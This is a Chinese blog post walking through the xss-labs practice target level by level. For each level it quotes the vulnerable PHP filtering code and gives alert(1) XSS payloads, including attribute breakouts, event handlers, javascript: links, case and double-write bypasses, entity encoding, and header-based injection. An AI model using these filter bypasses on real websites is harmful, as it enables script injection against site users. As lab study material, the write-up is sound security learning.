<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    
    <title>
        xss-labs靶机练习 | Ma4out7&#39;Blog
    </title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
        <link rel="shortcut icon" href="/images/avatar.jpg">
    
    
<link rel="stylesheet" href="/css/style.css">

    <script id="hexo-configurations">
    let CONFIG = {"hostname":"example.com","root":"/","localsearch":{"enable":true,"trigger":"auto","unescape":false,"preload":false},"themeInfo":{"name":"ILS","version":"2.0.2","author":"XPoet","repository":"https://github.com/XPoet/hexo-theme-ils"}};
  </script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
<div class="page-container">

    <header class="page-header">
        <div class="header-progress"></div>
    </header>

    <main class="page-main">

        <div class="page-main-content">

            <div class="page-main-content-top">
                <header class="header-wrapper">

    <div class="header-content">

        <a class="logo-title" href="/">
            Ma4out7&#39;Blog
        </a>

        <ul class="menu-list">
            
                <li class="menu-item">
                    <a class=""
                       href="/"
                    >
                        首页
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/archives"
                    >
                        归档
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/categories"
                    >
                        分类
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/tags"
                    >
                        标签
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/links"
                    >
                        友链
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/about"
                    >
                        关于
                    </a>
                </li>
            
        </ul>

        <div class="menu-bar">
            <div class="menu-bar-middle"></div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


            </div>

            <div class="page-main-content-middle">

                <main class="main-content normal-code-theme">

                    
                        <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <h3><a class="title-hover-animation">xss-labs靶机练习</a></h3>
        </div>

        <div class="meta-info">
            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa fa-calendar-o"></i> 2021-03-26 20:50:43
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fa fa-folder"></i>
            <ul>
                
                    <li>
                        <a href="/categories/%E9%9D%B6%E6%9C%BA/">靶机</a>
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa fa-tags"></i>
            <ul>
                
                    <li>
                        <a href="/tags/xss/">xss</a>
                    </li>
                
            </ul>
        </span>
    
    
    
    
</div>

        </div>

        <div class="article-content markdown-body">
            <p>先上图<br><img src="/2021/03/26/xss-labs/xss-labs/1.jpg" alt="xss思维导图"></p>
<h3 id="leve-1"><a href="#leve-1" class="headerlink" title="leve-1"></a>leve-1</h3><ul>
<li>无任何过滤，get 型，直接<code>&lt;script&gt;alert(1)&lt;/script&gt;</code></li>
</ul>
<h3 id="2"><a href="#2" class="headerlink" title="2."></a>2.</h3><ul>
<li>方法一:闭合 input 标签里面的<code>&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code></li>
<li>方法二:闭合 value 属性，在 input 标签中添加新的属性<code>&quot; onclick=&quot;alert(11)</code></li>
</ul>
<h3 id="3-HTML-实体化过滤"><a href="#3-HTML-实体化过滤" class="headerlink" title="3.HTML 实体化过滤"></a>3.HTML 实体化过滤</h3><ul>
<li>htmlspecialchars 函数可以过滤<code>&lt;``&gt;``&quot;</code>，但是不会过滤单引号，而且 value 的闭合也是采用单引号，所以会有 xss 漏洞</li>
<li>部分源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;h2 align=center&gt;没有找到和<span class="string">&quot;.htmlspecialchars(<span class="subst">$str</span>).&quot;</span>相关的结果.&lt;/h2&gt;<span class="string">&quot;</span></span><br><span class="line"><span class="string">&lt;input name=keyword  value=&#x27;&quot;</span>.htmlspecialchars($str).<span class="string">&quot;&#x27;&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="4-lt-和-gt-防御机制"><a href="#4-lt-和-gt-防御机制" class="headerlink" title="4.&lt;和&gt;防御机制"></a>4.&lt;和&gt;防御机制</h3><ul>
<li>先试探防御机制，发现 value 值中把“&lt;”过滤了，所以采用事件注入<br><code>&quot; onclick=&quot;alert(11)</code>成功弹框</li>
</ul>
<h3 id="5-ri-和-on-防御机制"><a href="#5-ri-和-on-防御机制" class="headerlink" title="5.ri 和 on 防御机制"></a>5.ri 和 on 防御机制</h3><ul>
<li>ri 替换为 r_i,on 替换为 o_n</li>
<li>过滤了<code>&quot; onclick=&quot;alert(11)``&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;``&quot;&gt;&lt;img src=1 onerror=alert(1)</code></li>
<li>可以使用新标签<code>&quot;&gt;&lt;a href=&quot;javascript:alert(1)&quot;</code></li>
</ul>
<h3 id="6-ri-和-on-href-防御机制"><a href="#6-ri-和-on-href-防御机制" class="headerlink" title="6.ri 和 on,href 防御机制"></a>6.ri 和 on,href 防御机制</h3><ul>
<li>ri 替换为 r_i,on 替换为 o_n,href 替换成 hr_ef,但是这道题没有过滤大小写。所以</li>
<li><code>&quot;&gt;&lt;a HREF=&quot;javascript:alert(1)&quot;</code></li>
</ul>
<h3 id="7-script-on-等关键字替换为空"><a href="#7-script-on-等关键字替换为空" class="headerlink" title="7.script,on 等关键字替换为空"></a>7.script,on 等关键字替换为空</h3><ul>
<li>双写绕过</li>
<li><code>&quot; oonnclick=&quot;alert(11)</code></li>
</ul>
<h3 id="8-过滤较全，使用-html-实体编码"><a href="#8-过滤较全，使用-html-实体编码" class="headerlink" title="8.过滤较全，使用 html 实体编码"></a>8.过滤较全，使用 html 实体编码</h3><ul>
<li>这道题过滤有点对，查看源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ini_set(<span class="string">&quot;display_errors&quot;</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">&quot;keyword&quot;</span>]);<span class="comment">#大小写过滤</span></span><br><span class="line">$str2=str_replace(<span class="string">&quot;script&quot;</span>,<span class="string">&quot;scr_ipt&quot;</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">&quot;on&quot;</span>,<span class="string">&quot;o_n&quot;</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">&quot;src&quot;</span>,<span class="string">&quot;sr_c&quot;</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">&quot;data&quot;</span>,<span class="string">&quot;da_ta&quot;</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">&quot;href&quot;</span>,<span class="string">&quot;hr_ef&quot;</span>,$str5);</span><br><span class="line">$str7=str_replace(<span class="string">&#x27;&quot;&#x27;</span>,<span class="string">&#x27;&amp;quot&#x27;</span>,$str6);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;center&gt;</span></span><br><span class="line"><span class="string">&lt;form action=level8.php method=GET&gt;</span></span><br><span class="line"><span class="string">&lt;input name=keyword  value=&quot;&#x27;</span>.htmlspecialchars($str).<span class="string">&#x27;&quot;&gt; #还有html编码</span></span><br></pre></td></tr></table></figure>

<ul>
<li>方法一：html 实体编码:<code>java&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;:alert(1)</code></li>
<li>方法二：fromCharCode()函数:<code>String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62)</code></li>
</ul>
<h3 id="9"><a href="#9" class="headerlink" title="9."></a>9.</h3><ul>
<li>通过试探，这一关与上一关不同的是会在上一关的基础上，加入地址的检查，首先判断会检查哪些内容，这一关会检查输入的数据中是否会有 http：//字段，所以需要在输入的字段中加入该字段</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">f(<span class="literal">false</span>===strpos($str7,<span class="string">&#x27;http://&#x27;</span>))</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&#x27;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;您的链接不合法？有没有！&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&#x27;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;&#x27;</span>.$str7.<span class="string">&#x27;&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>payload:<code>java&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;:alert(&#39;http://&#39;)</code></p>
<h3 id="10-hidden-属性值—隐藏无法触发事件"><a href="#10-hidden-属性值—隐藏无法触发事件" class="headerlink" title="10.hidden 属性值—隐藏无法触发事件"></a>10.hidden 属性值—隐藏无法触发事件</h3><ul>
<li>这一没有输入的地方，需要在 url 地址栏中输入，这一时输入是隐藏的，也就是说 keyname 并不是要注入的地方，真正注入的地方是三个 input，不过这三个被隐藏了，所以需要去试探这三个哪个是正确的，只有 t_sort 是正确的</li>
<li>这里的属性值是可以被替代的，通过再次<code>type=&quot;text&quot;</code>来重新设置属性值，然后添加事件，即可触发弹框</li>
<li>payload:<code>t_sort=&quot;2 type=&quot;text&quot; onclick=&quot;alert(1)</code></li>
<li>利用 html 的 accesskey 属性<br><code>t_sort=2&quot; accesskey=&quot;x&quot; onclick=&quot;alert(1)&quot; type=&quot;text&quot;</code></li>
</ul>
<h3 id="11-referer-注入"><a href="#11-referer-注入" class="headerlink" title="11.referer 注入"></a>11.referer 注入</h3><ul>
<li>源码，，(不看源码的话。。。没了呀)</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$str = $_GET[<span class="string">&quot;keyword&quot;</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">&quot;t_sort&quot;</span>];</span><br><span class="line">$str11=$_SERVER[<span class="string">&#x27;HTTP_REFERER&#x27;</span>];</span><br><span class="line">str22=str_replace(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&quot;&quot;</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">&quot;&lt;&quot;</span>,<span class="string">&quot;&quot;</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.htmlspecialchars($str).<span class="string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="string">&#x27;&lt;center&gt;</span></span><br><span class="line"><span class="string">&lt;form id=search&gt;</span></span><br><span class="line"><span class="string">&lt;input name=&quot;t_link&quot;  value=&quot;&#x27;</span>.<span class="string">&#x27;&quot; type=&quot;hidden&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;input name=&quot;t_history&quot;  value=&quot;&#x27;</span>.<span class="string">&#x27;&quot; type=&quot;hidden&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;input name=&quot;t_sort&quot;  value=&quot;&#x27;</span>.htmlspecialchars($str00).<span class="string">&#x27;&quot; type=&quot;hidden&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;input name=&quot;t_ref&quot;  value=&quot;&#x27;</span>.$str33.<span class="string">&#x27;&quot; type=&quot;hidden&quot;&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以看到，这里对 referer 参数替换了&lt;&gt;,没有了其他过滤，对于 t_sort 进行了 HTML 实体化，而且是双引号闭合，所以不会有注入。<br>referer 的 payload:在 hackbar 中传 referer 参数<code>t_ref=2&quot; onclick=&quot;alert(1)&quot; type=&quot;text</code></p>
<h3 id="12-User-agent-的-xss-注入"><a href="#12-User-agent-的-xss-注入" class="headerlink" title="12.User-agent 的 xss 注入"></a>12.User-agent 的 xss 注入</h3><ul>
<li>和 11 题的原理一样</li>
</ul>
<h3 id="13-cookie-的-xss-注入"><a href="#13-cookie-的-xss-注入" class="headerlink" title="13.cookie 的 xss 注入"></a>13.cookie 的 xss 注入</h3><ul>
<li>和上述差不多</li>
</ul>
<h3 id="14-这道题有问题"><a href="#14-这道题有问题" class="headerlink" title="14.这道题有问题"></a>14.这道题有问题</h3><h3 id="15-ng-include"><a href="#15-ng-include" class="headerlink" title="15.ng-include"></a>15.ng-include</h3><ul>
<li>源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">&quot;display_errors&quot;</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">&quot;src&quot;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;body&gt;&lt;span class=&quot;ng-include:&#x27;</span>.htmlspecialchars($str).<span class="string">&#x27;&quot;&gt;&lt;/span&gt;&lt;/body&gt;&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以看到的是，变量名是“src”，这也没有提示，确实猜不到<br>通过试探，发现所有的输入都会被注视到 ngInclude: 1 之后，所以先了解一下 ngInclude 它的作用<br>ng-include 指令用于包含外部的 HTML 文件。<br>包含的内容将作为指定元素的子节点。<br>ng-include 属性的值可以是一个表达式，返回一个文件名。<br>默认情况下，包含的文件需要包含在同一个域名下。<br>也就是说它的参数是一个 html 页面<br>发现在该页面会加载 level1 的页面，我们在 15 页面里面是没有注入点，但是在 1 页面里面有，尝试在 1 里面注入<br><code>src=&#39;level1.php?name=1&lt;script&gt;alert(1)&lt;/script&gt;&#39;</code><br>并没有被执行，因为通过 htmlspecialchars($str)函数，有些特殊字符被转码了，转为了 html 实体，所以我们采用其他标签的事件属性触发<br><code>src=&#39;level1.php?name=&lt;img src=1 onerror=alert(1)&gt;&#39;</code></p>
<h3 id="16"><a href="#16" class="headerlink" title="16."></a>16.</h3><ul>
<li>直接在前端页面中修改 img 标签即可。。</li>
<li>源码只是过滤了部分字符，payload<code>&lt;img%0asrc=1%0aonerror=alert(1)&gt;</code></li>
</ul>
<h3 id="17-18-19-20–"><a href="#17-18-19-20–" class="headerlink" title="17-18-19-20–"></a>17-18-19-20–</h3><ul>
<li>四道题都一类题，涉及 flash-xss，<code>swf</code>后缀文件–动画软件 Flash 的专用格式，广泛应用于网页设计和动画制作<br>部分源码如下</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">&quot;display_errors&quot;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;embed src=xsf01.swf?&quot;</span>.htmlspecialchars($_GET[<span class="string">&quot;arg01&quot;</span>]).<span class="string">&quot;=&quot;</span>.htmlspecialchars($_GET[<span class="string">&quot;arg02&quot;</span>]).<span class="string">&quot; width=100% heigth=100%&gt;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>embed 的语法格式：&lt;embed 属性 1=“属性值 1” 属性 2=“属性值 2”……&gt;<br>payload:<code>?arg01=a&quot; onmouseover=alert(1)&amp;arg02=b</code>但是没反应，不懂了。。。</p>

        </div>

        <div class="article-nav">
            
                <div class="article-prev">
                    <a class="prev btn"
                       rel="prev"
                       href="/2021/03/28/upload-labs/upload-labs/"
                    >
                        <i class="fa fa-chevron-left"></i> <span class="post-nav-title-item">upload-labs靶机练习</span><span class="post-nav-item">上一篇</span>
                    </a>
                </div>
            
            
                <div class="article-next">
                    <a class="next btn"
                       rel="next"
                       href="/2021/03/24/sql-labs/PAGE-1(Basic%20Challenges)/"
                    >
                        <span class="post-nav-title-item">sql_labs</span><span class="post-nav-item">下一篇</span> <i class="fa fa-chevron-right"></i>
                    </a>
                </div>
            
        </div>

        <div class="comment-container">
            <div class="comments-container">
    
        

    
</div>
        </div>
    </div>
</div>


                    

                </main>

            </div>

            <div class="page-main-content-bottom">
                <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy; 2021 <i class="fa fa-heart-o"></i> <a href="/">Ma4out7</a>
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动 | 主题 <a
                    href="https://github.com/XPoet/hexo-theme-ils" target="_blank">ILS v2.0.2</a>
        </div>
    </div>
</footer>

            </div>
        </div>
    </main>

    <div class="sidebar-tools">
        <div class="tools-container">
    <ul class="tools-list">
        
            <li class="search popup-trigger">
                <i class="fa fa-search"></i>
            </li>
            
<script src="/js/local-search.js"></script>

        
        <li class="mode-toggle">
            <i class="fa fa-moon-o"></i>
        </li>
        
        <li class="page-aside-toggle">
            <i class="fa fa-bars"></i>
        </li>
        
            <li class="scroll-to-top">
                <i class="fa fa-caret-up"></i>
            </li>
        
    </ul>
</div>

    </div>

    <!-- page aside -->
    <aside class="page-aside">
        
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#leve-1"><span class="nav-number">1.</span> <span class="nav-text">leve-1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2"><span class="nav-number">2.</span> <span class="nav-text">2.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-HTML-%E5%AE%9E%E4%BD%93%E5%8C%96%E8%BF%87%E6%BB%A4"><span class="nav-number">3.</span> <span class="nav-text">3.HTML 实体化过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-lt-%E5%92%8C-gt-%E9%98%B2%E5%BE%A1%E6%9C%BA%E5%88%B6"><span class="nav-number">4.</span> <span class="nav-text">4.&lt;和&gt;防御机制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-ri-%E5%92%8C-on-%E9%98%B2%E5%BE%A1%E6%9C%BA%E5%88%B6"><span class="nav-number">5.</span> <span class="nav-text">5.ri 和 on 防御机制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-ri-%E5%92%8C-on-href-%E9%98%B2%E5%BE%A1%E6%9C%BA%E5%88%B6"><span class="nav-number">6.</span> <span class="nav-text">6.ri 和 on,href 防御机制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-script-on-%E7%AD%89%E5%85%B3%E9%94%AE%E5%AD%97%E6%9B%BF%E6%8D%A2%E4%B8%BA%E7%A9%BA"><span class="nav-number">7.</span> <span class="nav-text">7.script,on 等关键字替换为空</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-%E8%BF%87%E6%BB%A4%E8%BE%83%E5%85%A8%EF%BC%8C%E4%BD%BF%E7%94%A8-html-%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81"><span class="nav-number">8.</span> <span class="nav-text">8.过滤较全，使用 html 实体编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9"><span class="nav-number">9.</span> <span class="nav-text">9.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-hidden-%E5%B1%9E%E6%80%A7%E5%80%BC%E2%80%94%E9%9A%90%E8%97%8F%E6%97%A0%E6%B3%95%E8%A7%A6%E5%8F%91%E4%BA%8B%E4%BB%B6"><span class="nav-number">10.</span> <span class="nav-text">10.hidden 属性值—隐藏无法触发事件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-referer-%E6%B3%A8%E5%85%A5"><span class="nav-number">11.</span> <span class="nav-text">11.referer 注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-User-agent-%E7%9A%84-xss-%E6%B3%A8%E5%85%A5"><span class="nav-number">12.</span> <span class="nav-text">12.User-agent 的 xss 注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-cookie-%E7%9A%84-xss-%E6%B3%A8%E5%85%A5"><span class="nav-number">13.</span> <span class="nav-text">13.cookie 的 xss 注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-%E8%BF%99%E9%81%93%E9%A2%98%E6%9C%89%E9%97%AE%E9%A2%98"><span class="nav-number">14.</span> <span class="nav-text">14.这道题有问题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-ng-include"><span class="nav-number">15.</span> <span class="nav-text">15.ng-include</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16"><span class="nav-number">16.</span> <span class="nav-text">16.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17-18-19-20%E2%80%93"><span class="nav-number">17.</span> <span class="nav-text">17-18-19-20–</span></a></li></ol>
    </div>
</div>
        
    </aside>

</div>



    <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-icon">
            <i class="fa fa-search"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>



<script src="/js/main.js"></script>
<script src="/js/header-shrink.js"></script>
<script src="/js/toggle-mode.js"></script>



    
<script src="/js/scroll-to-top.js"></script>





    
        
<script src="/js/code-copy.js"></script>

    

    
        
<script src="/lib/anime.min.js"></script>
<script src="/js/toc.js"></script>
<script src="/js/post-toc.js"></script>

    



</body>
</html>